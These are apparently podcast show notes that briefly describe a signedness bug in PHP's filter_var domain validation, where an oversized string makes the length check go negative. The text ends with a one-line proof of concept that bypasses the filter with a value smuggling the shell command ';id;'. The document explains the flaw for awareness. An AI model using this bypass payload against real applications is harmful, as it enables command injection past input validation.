Unsigned to Signed Conversion Leading to filter_var Bypass

We discussed this vulnerability during Episode 131 on 28 March 2022

Cool trick impacting php’s filter_var which is actually a bit of a binary-level issue, if you provide a long enough string as the argument to filter_vareventually some code for (FILTER_VALIDATE_DOMAIN and FILTER_FLAG_HOSTNAME) will mistakenly believe the size is much smaller than it actually is (negative).

This can be exploited by providing a long string that still contains some of the things it checks for such as . for the tld. Ultimately leading to a filter bypass looking something like:

// filter bypass  
var_dump(filter_var("5;id;" . str_repeat("a", 4294967286) . "a.com", FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME));